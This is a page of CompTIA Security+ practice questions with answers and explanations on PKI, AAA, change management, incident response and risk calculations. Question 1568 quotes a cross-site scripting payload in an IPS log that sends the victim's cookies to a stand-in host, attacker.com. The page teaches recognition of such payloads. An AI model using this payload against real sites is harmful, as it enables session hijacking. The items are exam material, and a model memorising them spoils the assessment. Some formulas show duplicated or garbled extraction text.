All practice questions

2232 questions

Question 1561Question

An organization wants to optimize web traffic performance and protect user privacy by reducing client requests to external Certificate Authorities for certificate status verification. Which of the following PKI mechanisms allows the web server itself to fetch and present a signed, timestamped certificate status directly to the client during the TLS handshake?

Show answer & explanation

Answer: OCSP stapling

Answer

OCSP stapling allows the web server to query the CA and supply a timestamped validation response directly to the client during the TLS handshake.
OCSP stapling allows the web server to query the Online Certificate Status Protocol responder periodically, cache the timestamped signed response, and present it directly to the client during the TLS handshake. This reduces latency and prevents third-party CAs from tracking client IP addresses.

Step-by-Step Solution

1
Identify the performance and privacy requirement
Clients need to verify whether a server's X.509 certificate has been revoked without making distinct outbound HTTP queries to third-party CAs.
Direct client queries to an Online Certificate Status Protocol (OCSP) responder create connection latency and reveal user browsing behavior.
2
Select the PKI feature designed for server-side revocation caching
OCSP stapling offloads OCSP queries to the web server, which periodically retrieves the signed response and appends ('staples') it to the TLS handshake.
This allows clients to verify validity immediately during connection establishment.

Key Concept

OCSP Stapling
Question 1562Question

An organization is updating its enterprise access management architecture to align with security frameworks. Match each operational capability on the left to the corresponding pillar or sub-component of the Authentication, Authorization, and Accounting (AAA) framework on the right.

Click a left item, then click its matching right item

Items

Validating user identity claims using a smart card PIN and biometric scanner upon initial workstation sign-in.
Evaluating security group memberships to grant read-only access to specific financial database tables.
Logging session timestamps, bandwidth usage, and administrative CLI command histories to a central SIEM server.
Requesting additional verification factors dynamically when a user attempts access from an unrecognized IP address.

Matches

Show answer & explanation

Answer

Validating user identity via smart card PIN and biometrics maps to Primary Authentication; evaluating group permissions for database access maps to Authorization; logging timestamps, bandwidth, and command histories maps to Accounting; dynamically prompting for extra factors based on location risk maps to Adaptive (Risk-Based) Authentication.
Each item directly aligns with a specific component of the AAA framework. Validating identity via smart card and biometrics is Primary Authentication. Granting or restricting resource access according to permissions is Authorization. Recording session data and command history for forensic audit trail purposes is Accounting. Adjusting authentication steps based on contextual risk indicators (like unfamiliar IP addresses) is Adaptive Authentication.

Step-by-Step Solution

1
Identify the primary function of each scenario item.
Categorize each operational capability according to whether it verifies identity (Authentication), determines privileges (Authorization), or records usage/activity (Accounting).
AAA establishes clear boundaries between verifying who a user is, controlling what they can do, and tracking what they did.
2
Differentiate baseline authentication from dynamic authentication.
Standard multi-factor verification at logon corresponds to Primary Authentication, while contextual step-up verification triggered by anomalous conditions corresponds to Adaptive Authentication.
Adaptive authentication alters identity verification requirements depending on risk signals like unknown network locations.
3
Confirm permission and logging assignments.
Database access rights align with Authorization, and SIEM command/session logs align with Accounting.
Access rights define permissions (authorization), and historical logs provide accountability and auditability (accounting).

Key Concept

Authentication, Authorization, and Accounting (AAA) Framework
Question 1563Question

A healthcare organization's cloud operations team plans to update the TLS configuration on its primary API gateways by disabling TLS 1.0 and 1.1 to comply with updated security baselines. Before the Change Advisory Board (CAB) approves this modification, which action should the security team mandate to evaluate the potential security and functional impact of the proposed change?

Show answer & explanation

Answer: Perform an inventory and dependency analysis to identify internal and legacy external systems that rely on older encryption protocols.

Answer

Perform an inventory and dependency analysis to identify internal and legacy external systems that rely on older encryption protocols.
Performing a thorough dependency analysis allows the security and operations teams to identify legacy applications, client software, or third-party services that depend on older TLS versions. Discovering these dependencies before the Change Advisory Board (CAB) approves the request ensures that potential outages are identified early, remediation plans are established, and security impacts are fully understood.

Step-by-Step Solution

1
Evaluate the scope of the proposed infrastructure change.
Disabling legacy cryptographic protocols (TLS 1.0/1.1) affects all incoming client connections that have not updated to modern TLS standards.
Changes to security baselines can break dependent systems if clients rely on deprecated protocol suites.
2
Identify necessary pre-approval change control procedures.
A comprehensive dependency analysis must be conducted to discover legacy integrations, API consumers, and client applications.
Change management policy requires assessing potential operational disruptions and security impacts before CAB approval.
3
Select the option that properly executes a security impact assessment within the formal change control lifecycle.
Conducting an inventory and dependency audit provides empirical risk data to the CAB.
Proactive dependency analysis prevents unexpected service outages and maintains secure operations.

Key Concept

Change Management Security Impact and Dependency Analysis
Question 1564Question

A security administrator is configuring a new high-security internal microservice that requires a valid server TLS certificate. Enterprise policy mandates hardware key protection, accurate Subject Alternative Name (SAN) extension mapping, intermediate CA trust anchoring, and OCSP stapling to eliminate direct client queries to the Certificate Authority. In what order should the administrator perform the following steps to deploy the certificate and enable OCSP stapling?

Drag items to arrange them in the correct order

Show answer & explanation

Answer

The correct sequence begins with generating the private key and CSR with SAN attributes, followed by submitting the CSR to the intermediate CA for issuance, installing the server certificate and intermediate CA chain, querying and caching the timestamped OCSP response from the responder, and finally enabling OCSP stapling on the web server.
The proper sequence follows standard PKI lifecycle principles: key generation and CSR creation must precede CA submission and signing. Once the CA returns the signed certificate, installing it along with the intermediate CA chain establishes local service readiness. Next, the server must query the OCSP responder to cache a valid, time-stamped status assertion. Finally, enabling OCSP stapling allows the server to serve this cached status to clients during TLS negotiation.

Step-by-Step Solution

1
Generate key pair and create CSR
A CSR containing the public key and SAN extensions is created, while the private key remains protected in the hardware module.
PKI certificate issuance requires a CSR that includes the public key and identity information before contacting a CA.
2
Submit CSR to Intermediate CA
The CA validates the request, signs the certificate, and returns the signed X.509 certificate.
The CA must sign the public key and SAN details to establish authenticity and issue the valid certificate.
3
Install server certificate and trust chain
The web server is configured with its identity certificate and intermediate CA chain.
The server requires the certificate and full intermediate chain to establish trust with clients during TLS handshakes.
4
Fetch and cache OCSP response
The server securely queries the CA's OCSP responder and receives a signed status payload.
OCSP stapling requires the server itself to periodically contact the OCSP responder and cache the time-stamped proof of validity.
5
Enable OCSP stapling for TLS handshakes
Connecting clients receive the server's OCSP response directly during the TLS handshake.
OCSP stapling delivers the pre-fetched revocation status to the client during negotiation, eliminating client-side CA lookup latency and preserving privacy.

Key Concept

PKI Certificate Enrollment and OCSP Stapling Lifecycle Workflow
Estimated Time:2m 0s
Question 1565Question

A security analyst is selecting a key exchange mechanism for lightweight microservices communicating over an untrusted enterprise network. The solution must allow the services to negotiate shared symmetric session keys, ensure that compromise of a long-term private key does not expose past session traffic (perfect forward secrecy), and minimize CPU computational overhead on the constrained nodes. Which of the following algorithms or protocols best fulfills these requirements?

Show answer & explanation

Answer: ECDHE (Elliptic Curve Diffie-Hellman Ephemeral)

Answer

ECDHE (Elliptic Curve Diffie-Hellman Ephemeral) is the correct choice because it enables key agreement with perfect forward secrecy using lower computational overhead than traditional asymmetric methods.
ECDHE (Elliptic Curve Diffie-Hellman Ephemeral) uses temporary, ephemeral keys generated for each session to ensure perfect forward secrecy. Because it uses elliptic curve cryptography, it requires substantially less processing power and memory than traditional finite-field Diffie-Hellman or static RSA.

Step-by-Step Solution

1
Identify the primary cryptographic requirement
The scenario requires key exchange with perfect forward secrecy (PFS) and high computational efficiency.
Session keys must be dynamically negotiated without relying on static long-term private keys for decryption.
2
Evaluate key agreement protocols against constraints
Diffie-Hellman with ephemeral keys (DHE) provides PFS. Adding Elliptic Curve Cryptography (ECDHE) reduces resource consumption.
ECC achieves equivalent key strength with significantly shorter key lengths compared to standard Diffie-Hellman or RSA.
3
Eliminate non-key-exchange mechanisms
Discard symmetric ciphers (AES-GCM) and hash authentication mechanisms (HMAC) as they do not perform key negotiation.
Selecting symmetric ciphers or hashes mistakes bulk data protection for key establishment protocols.

Key Concept

Diffie-Hellman Ephemeral and Perfect Forward Secrecy
Question 1566Question

A security analyst monitoring network security telemetry reviews the following correlated NIDS alert and NetFlow summary:

[ALERT] NIDS: Suspicious Protocol Anomaly Detected
Timestamp: 2026-07-27T14:22:10Z
Sensor ID: NIDS-PERIMETER-01
Source IP: 10.1.50.88 (Internal Workstation)
Destination IP: 203.0.113.195 (External Host)
Protocol: ICMP Type 8 (Echo Request)
Details: ICMP payload size 1480 bytes; Payload Entropy: 7.92 (High); Request Rate: 450/min

NetFlow Summary (10.1.50.88 -> 203.0.113.195):
Bytes Sent: 52,400,000 | Bytes Received: 12,000 | Total Packets: 35,500

Based on the telemetry provided, which of the following represents the primary threat activity occurring and the most appropriate immediate action?

Show answer & explanation

Answer: ICMP tunneling for data exfiltration; immediately isolate host 10.1.50.88 from the network.

Answer

ICMP tunneling for data exfiltration; immediately isolate host 10.1.50.88 from the network.
The correct answer identifies ICMP tunneling and specifies immediate host isolation. High payload entropy (7.92), maximum payload size (1480 bytes), and over 52 MB of outbound data transferred over ICMP Echo Requests are classic indicators of data exfiltration via protocol tunneling. Isolating host 10.1.50.88 stops ongoing exfiltration during incident response containment.

Step-by-Step Solution

1
Analyze the protocol anomalies in the NIDS alert.
Identified ICMP Type 8 traffic with abnormally large payload sizes (1480 bytes), a high request rate (450/min), and near-maximum randomness/entropy (7.92).
Standard ICMP ping packets carry small, deterministic payloads. Encrypted or compressed data encapsulated inside ICMP packets exhibits high entropy and maxed-out frame sizes.
2
Correlate packet inspection data with NetFlow volumetric telemetry.
Observed severe volume asymmetry: 52.4 MB sent outbound versus 12 KB received inbound across 35,500 ICMP packets.
Large outbound byte volume compared to minimal return bytes over a control protocol confirms data leaving the network (exfiltration) rather than simple ping sweeping or C2 command reception.
3
Determine the appropriate immediate containment response.
Host isolation of the compromised internal IP (10.1.50.88).
Containment must occur at the source system to stop active data exfiltration before performing detailed root-cause investigation or remediation.

Key Concept

Identifying covert ICMP data exfiltration through protocol anomaly analysis and NetFlow volumetric correlation.
Question 1567Question

A security operations team is implementing a Just-In-Time (JIT) Privileged Access Management (PAM) workflow to enforce least privilege for emergency system administration. Place the operational steps of the JIT access lifecycle in the correct sequential order from initial request submission to final audit completion.

Drag items to arrange them in the correct order

Show answer & explanation

Answer

The correct sequential order for the JIT PAM access lifecycle is: 1) Submission of a time-bound request with justification, 2) Policy evaluation and approval routing, 3) Provisioning of ephemeral credentials and session brokering, 4) Execution of administrative duties within the active session window, and 5) Session termination, credential rotation, and audit log archiving upon expiration.
The proper operational sequence follows standard IAM lifecycle controls: submitting a justified request, obtaining policy authorization, issuing ephemeral credentials with monitoring, performing work within the window, and automatically revoking access while archiving audit logs upon expiration.

Step-by-Step Solution

1
Identify the request initiation step
The process starts when an administrator requests temporary access with ticket context.
JIT access relies on demand-based request triggers rather than static standing privileges.
2
Determine the authorization and governance step
The PAM system verifies rules and obtains necessary approvals.
Authorization must precede credential issuance to enforce identity policies.
3
Identify credential issuance and session setup
Ephemeral credentials or proxy sessions are created with keystroke and session logging.
Brokered access prevents administrators from knowing or storing static root secrets.
4
Determine the task execution step
The user completes maintenance within the active access window.
Administrative tasks must occur inside the securely brokered session framework.
5
Identify session closure and log archiving
Access is automatically revoked, temporary credentials are invalidated, and audit logs are saved.
Automated teardown prevents privilege creep and lingering unauthorized access.

Key Concept

Just-In-Time (JIT) Privileged Access Management (PAM) Operational Sequence
Question 1568Question

A network security analyst reviews an alert generated by an inline Network Intrusion Prevention System (NIPS) deployed at the enterprise boundary. The alert log displays the following HTTP request payload captured during an inbound connection:

`GET /profile.php?user=<script>document.location='http://attacker.com/steal.cgi?cookie='+document.cookie</script> HTTP/1.1`

Immediately following this log entry, the NIPS triggered an automated active response that dropped the TCP stream and blocked the remote source IP address for 60 minutes. Which of the following statements correctly identifies the vector of this attack and characterizes the primary security control function demonstrated by the NIPS?

Show answer & explanation

Answer: The payload represents a Cross-Site Scripting (XSS) attack vector, and the NIPS executed a preventive control by stopping the malicious traffic inline.

Answer

The payload represents a Cross-Site Scripting (XSS) attack vector, and the NIPS executed a preventive control by stopping the malicious traffic inline.
The correct response identifies the payload containing JavaScript tags (`<script>`) as a Cross-Site Scripting (XSS) attempt designed to steal session cookies. Because the inline NIPS actively dropped the packet stream and blocked the source IP, it functioned as a preventive control rather than merely detecting or logging the event.

Step-by-Step Solution

1
Analyze the request payload in the NIPS log entry.
The payload `<script>document.location=...</script>` attempts client-side JavaScript execution, characteristic of Cross-Site Scripting (XSS).
Identifying HTML script tags attempting cookie exfiltration differentiates XSS from database manipulation techniques like SQL Injection.
2
Evaluate the control action executed by the NIPS.
The NIPS dropped the TCP stream and blocked the remote source IP address inline.
Active mechanisms that interdict and block malicious traffic before reaching the destination perform a preventive security function.

Key Concept

Network Intrusion Prevention Systems (NIPS) provide active inline prevention against application-layer attacks like Cross-Site Scripting (XSS).
Estimated Time:1m 30s
Question 1569Question

An enterprise security operations team needs to update core firewall access control lists (ACLs) to accommodate a new external application service. Place the standard security change management workflow steps in the correct chronological order from first to last.

Drag items to arrange them in the correct order

Show answer & explanation

Answer

The correct sequence for the change control workflow is: 1) Perform security impact analysis and document backout plan, 2) Submit change request to CAB for authorization, 3) Validate changes in a staging environment, 4) Implement changes in production during authorized window, and 5) Conduct post-implementation review.
A structured change management workflow ensures security oversight by requiring initial risk assessment and backout planning, CAB authorization, pre-deployment staging validation, scheduled production execution, and final post-implementation verification.

Step-by-Step Solution

1
Analyze security impact and draft change documentation.
A clear scope, security assessment, and rollback strategy are documented.
Change management policy requires thorough risk assessment before seeking organizational approval.
2
Submit proposal for CAB review.
The Change Advisory Board evaluates business risk and approves implementation.
Formal authorization ensures change alignment with organizational risk tolerance and operational schedules.
3
Execute testing in staging environment.
The proposed rule set and backout steps are validated as safe and functional.
Pre-production testing prevents unexpected outages or unintended security exposure on live networks.
4
Deploy modifications into production.
Firewall ACL updates are applied during the scheduled change window.
Execution within maintenance windows minimizes business disruption during system updates.
5
Perform post-implementation review.
Production security baselines are audited and the change ticket is closed.
Post-implementation audit confirms successful deployment and verifies no drift from baseline security requirements.

Key Concept

Formal Change Management Workflow and Security Impact Lifecycle
Question 1570Question

During routine monitoring, a Security Operations Center (SOC) team detects an active Command and Control (C2) session originating from an internal workstation following the execution of an unauthorized payload. Security logs indicate the compromised host is attempting lateral reconnaissance against neighboring internal subnets. According to standard incident response frameworks, which of the following actions should the incident response team perform FIRST?

Show answer & explanation

Answer: Isolate the compromised workstation from the network using endpoint containment controls

Answer

Isolate the compromised workstation from the network using endpoint containment controls
In standard incident response frameworks (such as NIST SP 800-61), once an incident is identified, the immediate priority is Containment. Isolating the compromised host from the network stops active Command and Control (C2) communication and prevents lateral movement to other internal systems before eradication and recovery steps take place.

Step-by-Step Solution

1
Determine the current stage of the incident response lifecycle
The incident has been confirmed and active threat activity (C2 traffic and lateral movement) is identified.
Identifying the current phase determines the next mandatory action under NIST SP 800-61 frameworks.
2
Identify the immediate next lifecycle phase
The phase directly following Identification is Containment.
Containment limits the scope of damage and prevents further propagation of the compromise.
3
Select the appropriate containment procedure
Execute host-level isolation of the compromised endpoint.
Disconnecting the endpoint from the network isolates the threat without destroying volatile memory needed for evidence collection.

Key Concept

Incident Response Process and Playbooks - Containment Phase Execution
Question 1571Question

A security analyst must assign the appropriate scanning methodology to four distinct security assessment requirements within an enterprise organization. Match each security assessment requirement with the most appropriate vulnerability scanning methodology.

Click a left item, then click its matching right item

Items

Evaluating external network perimeter exposure to internet-facing probes without utilizing system privileges.
Auditing local software inventory, patch levels, and internal registry configurations with minimal network bandwidth usage.
Testing network defensive security control responses by intentionally attempting known exploit payloads against dedicated sandbox targets.
Verifying operating system hardening configurations against established CIS benchmark standards using valid administrative domain accounts.

Matches

Show answer & explanation

Answer

External perimeter evaluation matches External non-credentialed network scan; Local inventory audit with low bandwidth matches Host-based agent assessment; Active payload testing matches Intrusive vulnerability scan; CIS benchmark hardening audit matches Credentialed compliance scan.
Each vulnerability scanning approach targets specific assessment goals: external unauthenticated scans measure public exposure, host agents gather local patch data with minimal network footprint, intrusive scans test active exploitability, and credentialed compliance scans verify configuration baselines against security standards.

Step-by-Step Solution

1
Analyze the requirement for perimeter exposure without system privileges.
Identify that testing from outside without privileges requires an external non-credentialed network scan.
Non-credentialed external scans simulate an unauthenticated remote attacker evaluating the public attack surface.
2
Analyze the requirement for internal registry and patch auditing with minimal network bandwidth usage.
Identify that host-based agents collect configuration and patch data locally without sending network probes.
Agent-based scanning executes directly on the host operating system, reducing network traffic and capturing data on disconnected endpoints.
3
Analyze the requirement for testing defensive controls with exploit payloads.
Identify that active exploit attempts characterize intrusive vulnerability scanning.
Intrusive scans go beyond identification by attempting to verify exploitability, which can impact target stability.
4
Analyze the requirement for checking CIS hardening baselines using domain accounts.
Identify that credentialed compliance scans use elevated accounts to check security baseline settings.
Reading deep system configurations and registry settings requires administrative privileges.

Key Concept

Vulnerability Scanning Methodologies and Assessment Configurations
Question 1572Question

A company is conducting a quantitative risk assessment for a standalone database server. The Asset Value (AVAV) of the server is $20,000\$20,000, and the estimated Exposure Factor (EFEF) for a server drive failure is 0.250.25 (25%25\%). Historical records indicate that this failure occurs once every two years, resulting in an Annual Rate of Occurrence (AROARO) of 0.50.5. What is the Annual Loss Expectancy (ALEALE) for this risk?

Show answer & explanation

Answer: $2,500\$2,500

Answer

The Annual Loss Expectancy (ALE) is $2,500\$2,500.
The correct answer is $2,500\$2,500 because Annual Loss Expectancy (ALEALE) is determined using the standard quantitative formula ALE=SLE×AROALE = SLE \times ARO, where SLE=AV×EFSLE = AV \times EF. Multiplying the asset value of $20,000\$20,000 by the 0.250.25 exposure factor gives an SLESLE of $5,000\$5,000. Multiplying $5,000\$5,000 by the annual rate of occurrence (0.50.5) results in an ALEALE of $2,500\$2,500.

Step-by-Step Solution

1
Calculate the Single Loss Expectancy (SLE)
SLE=AV×EF=$20,000×0.25=$5,000SLE = AV \times EF = \$20,000 \times 0.25 = \$5,000
Single Loss Expectancy measures the monetary loss of a single risk occurrence.
2
Calculate the Annual Loss Expectancy (ALE)
ALE=SLE×ARO=$5,000×0.5=$2,500ALE = SLE \times ARO = \$5,000 \times 0.5 = \$2,500
Annual Loss Expectancy represents the expected annual financial loss by factoring in how frequently the loss occurs per year.

Key Concept

Quantitative Risk Analysis (ALE calculation)
Question 1573Question

A security administrator is evaluating mechanisms to verify whether a digital certificate has been invalidated before its natural expiration date. Which of the following methods can be used to check the revocation status of an enterprise TLS certificate? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Querying an Online Certificate Status Protocol (OCSP) responder for real-time validation; Downloading a Certificate Revocation List (CRL) published by the issuing CA

Answer

The revocation status of a digital certificate can be checked using Online Certificate Status Protocol (OCSP) queries and Certificate Revocation Lists (CRLs).
Online Certificate Status Protocol (OCSP) queries provide a real-time method to check certificate status with a responder, while Certificate Revocation Lists (CRLs) provide a published list of revoked certificate serial numbers by the CA. Both are standard mechanisms designed specifically to verify revocation status.

Step-by-Step Solution

1
Identify the goal of checking if a certificate was revoked prior to expiration.
Recognize that PKI provides specific revocation checking mechanisms maintained by or linked to the issuing CA.
Certificates can be compromised or superseded before their validity period ends.
2
Evaluate standard PKI revocation mechanisms.
Identify Online Certificate Status Protocol (OCSP) for real-time status checks and Certificate Revocation Lists (CRLs) for downloadable lists of revoked certificate serial numbers.
Both protocols exist specifically to communicate revocation status from the CA to relying parties.

Key Concept

Certificate Revocation Validation (CRL and OCSP)
Estimated Time:45s
Question 1574Question

Following an enterprise-wide audit, a Chief Information Security Officer (CISO) is restructuring the organizational governance framework to clear up employee confusion between mandatory directives and discretionary recommendations. Which of the following governance document types establish mandatory requirements that enforce compliance across the enterprise? (Select TWO).

Select all that apply

Show answer & explanation

Answer: Security Policies; Security Standards

Answer

Security Policies and Security Standards are mandatory elements of a governance framework.
In security governance, Security Policies serve as the overarching executive directives that define high-level mandatory rules, objectives, and responsibilities. Security Standards support policies by providing explicit, compulsory specifications, metrics, and technology baselines that all systems and staff must strictly adhere to.

Step-by-Step Solution

1
Analyze governance document categories for mandatory versus discretionary attributes.
Identify that policies (high-level executive directives) and standards (specific operational/technical baselines) are compulsory.
Governance frameworks separate mandatory directives from non-binding guidance to establish enforceable compliance boundaries.
2
Evaluate discretionary options and operational implementation details.
Distinguish guidelines as optional advice and procedures/compensating controls as operational steps or technical remedies.
Guidelines advise rather than enforce, while procedures supply action steps without defining governance authority.

Key Concept

Security Governance Hierarchy (Mandatory Directives vs. Discretionary Guidance)
Question 1575Question

An enterprise security engineer configures a centralized TACACS+ server to manage administrative access to core switches. A network technician successfully enters their credentials and time-based one-time password (TOTP) to establish an interactive console session. However, when attempting to execute interface configuration commands, the router rejects the command with a privilege denial message. Which pillar of the AAA framework is responsible for determining whether the technician can execute these specific commands?

Show answer & explanation

Answer: Authorization

Answer

Authorization is the AAA pillar responsible for validating and granting specific privilege levels and command permissions to an identified user.
Authorization is the AAA component that determines the specific actions, resources, and commands an authenticated user is permitted to access. In this scenario, while authentication succeeded at login, authorization policies restricted the user from executing privileged configuration commands.

Step-by-Step Solution

1
Analyze the initial logon phase in the scenario.
The technician successfully provided a username, password, and TOTP to establish identity.
This confirms that the Authentication pillar successfully verified who the technician is.
2
Evaluate the cause of the command execution failure.
The system denied access when specific configuration commands were entered.
Permissions and command-level access privileges are governed by policy enforcement within Authorization.
3
Identify the corresponding AAA pillar.
Authorization governs command-level restrictions in protocols such as TACACS+.
Per-command privilege checking is the explicit function of Authorization.

Key Concept

Authentication, Authorization, and Accounting (AAA) Functional Roles
Estimated Time:1m 0s
Question 1576Question

An enterprise security analyst investigates an incident where several corporate accounts were compromised. The investigation reveals that employees received text messages on their mobile devices directing them to a fake login site to verify credentials. Additionally, the attacker placed phone calls to affected staff while pretending to be internal IT personnel to convince them to approve multi-factor authentication (MFA) push notifications. Which of the following social engineering attack vectors were directly executed in this campaign? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Smishing; Vishing

Answer

The threat actor utilized smishing (SMS-based phishing) and vishing (voice-based phishing) during the attack.
The scenario describes two specific delivery mediums: text messages (SMS) used to send malicious links, which defines smishing; and voice phone calls used to manipulate employees into approving MFA push notifications, which defines vishing.

Step-by-Step Solution

1
Analyze the text message delivery mechanism described in the scenario.
Identify that text messages sent to mobile devices directing users to a fake site constitute smishing.
Smishing is social engineering performed specifically over SMS communications.
2
Analyze the voice call delivery mechanism described in the scenario.
Identify that phone calls from an attacker posing as IT personnel constitute vishing.
Vishing involves voice calls (telephone/VoIP) to impersonate trusted entities and deceive victims.

Key Concept

Social Engineering Attack Vectors (Smishing vs. Vishing)
Question 1577Question

A security analyst is configuring an automated SOAR workflow to respond to account compromise indicators stemming from impossible travel alerts. Which of the following automated actions should be incorporated into the playbook to ensure immediate identity containment while avoiding unintended enterprise disruptions? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Revoke all active OAuth and session tokens for the impacted user account across identity providers.; Enforce mandatory step-up multi-factor authentication (MFA) on all subsequent login requests for the user.

Answer

Revoking active OAuth and session tokens across identity providers and enforcing mandatory step-up multi-factor authentication (MFA) on subsequent logins.
Revoking active session tokens immediately terminates unauthorized access, while enforcing step-up multi-factor authentication prevents secondary compromised logins. These target the identity layer safely without disrupting surrounding infrastructure.

Step-by-Step Solution

1
Evaluate containment actions suitable for automated identity compromise response.
Identify actions that target identity sessions directly without impacting shared identity infrastructure.
SOAR playbooks must balance rapid response with business continuity guardrails.
2
Select immediate session revocation and mandatory step-up MFA challenges.
Existing sessions are immediately invalidated, and new sessions are blocked without secondary verification.
Combining token revocation with step-up MFA neutralizes active access and prevents re-entry.
3
Reject high-risk infrastructure isolation and ineffective access control adjustments.
Avoid isolating core domain controllers or altering RBAC rights while sessions remain open.
Host isolation on core infrastructure causes service outages, and authorization modifications do not kill existing session tokens.

Key Concept

SOAR Identity Containment Playbooks and Session Revocation
Question 1578Question

A security administrator is deploying a centralized access management solution for enterprise network infrastructure. Which of the following technical configurations directly represent the Authorization pillar of the AAA framework? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Assigning Cisco privilege level 15 permissions to network engineers upon session establishment on core routers.; Applying security group policies that restrict database backup accounts to read-only permissions on storage volumes.

Answer

The configurations representing Authorization are assigning privilege level 15 permissions to network engineers on core routers and applying security group policies that restrict backup accounts to read-only permissions on storage volumes.
Authorization specifies rights, privileges, and access levels granted to an entity. Assigning router privilege levels determines which commands an administrator can execute, and applying security group policy restrictions limits account rights on storage volumes. Both actions directly define and enforce access rights.

Step-by-Step Solution

1
Analyze each option against the core definitions of AAA (Authentication, Authorization, and Accounting).
Identify whether the configuration verifies identity (Authentication), defines permissions/access rights (Authorization), or records user activity/events (Accounting).
AAA components separate identity proof, permission assignment, and event logging into distinct operational pillars.
2
Evaluate privilege assignment and policy restriction controls.
Determined that assigning router privilege levels and restricting storage volume access to read-only explicitly control permissions.
Authorization enforces access boundaries and determines what an authenticated subject is allowed to do.
3
Evaluate credential verification and audit logging controls.
Determined that smart card PIN validation is authentication, and CLI command history logging is accounting.
Credential validation proves identity, while command logging records activity for compliance and forensic tracking.

Key Concept

Authentication, Authorization, and Accounting (AAA)
Question 1579Question

A DevOps engineering team plans to deploy an automated continuous integration and continuous deployment (CI/CD) pipeline update that alters how production application secrets are fetched and stored. To minimize potential security impacts and align with enterprise change management governance, which of the following procedures should be completed before deploying this change to production? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Perform a security impact analysis and test the new secret management workflow within an isolated staging environment.; Obtain approval from the Change Advisory Board (CAB) following a documented evaluation of the rollback strategy.

Answer

Prior to deploying a CI/CD pipeline change affecting application secrets to production, the team must evaluate the security impact in a staging environment and obtain CAB authorization alongside a validated rollback plan.
Proper change control requires validating security impacts in non-production environments and obtaining formal approval from governance bodies like the Change Advisory Board (CAB) supported by a verified rollback plan. This ensures both operational continuity and security posture preservation.

Step-by-Step Solution

1
Identify key requirements of enterprise change management
Recognize that change management requires testing security impacts in staging and securing formal approval before production release.
Deploying untested changes to production or bypassing change control increases operational and security risk.
2
Evaluate the correct operational and governance controls
Selecting staging environment security testing and CAB review with a documented rollback plan satisfies both security analysis and administrative compliance.
CAB review verifies risk exposure, while staging validation ensures secret isolation mechanisms function without breaking dependent services.
3
Eliminate inappropriate control actions and ineffective mitigations
Discard option suggesting control reclassification and option relying on external WAF rules to fix internal software flaws.
Reclassifying control types does not mitigate risk, and network perimeter controls cannot remediate application-level credential handling flaws.

Key Concept

Change Management Workflows and Security Impact Assessments
Question 1580Question

An organization evaluates the financial impact of a potential security breach on its primary cloud backup repository. The repository has an estimated Asset Value (AVAV) of $50,000\$50,000. Security analysts determine that a severe ransomware infection would result in an Exposure Factor (EFEF) of 40%40\%. What is the Single Loss Expectancy (SLESLE) in dollars for this asset?

Show answer & explanation

Answer: 20000

Answer

The Single Loss Expectancy (SLE) for the cloud backup repository is $20,000.
Single Loss Expectancy (SLESLE) measures the total monetary loss resulting from a single risk event. It is calculated using the formula SLE=AV×EFSLE = AV \times EF. Substituting the given values yields SLE=$50,000×0.40=$20,000SLE = \$50,000 \times 0.40 = \$20,000.

Step-by-Step Solution

1
Identify the quantitative risk formula for Single Loss Expectancy (SLE).
SLE=AV×EFSLE = AV \times EF
Single Loss Expectancy measures the monetary loss expected each time a threat realizes against an asset.
2
Multiply the Asset Value (AVAV) of 50,000bytheExposureFactor(50,000 by the Exposure Factor ( EF$) of 0.40.
20,000
Applying the 40% loss percentage to the full asset value yields the expected financial loss per incident.

Key Concept

Single Loss Expectancy (SLE) Calculation
PreviousPage 79 / 112Next
All practice questions — CompTIA Security+ | Examkin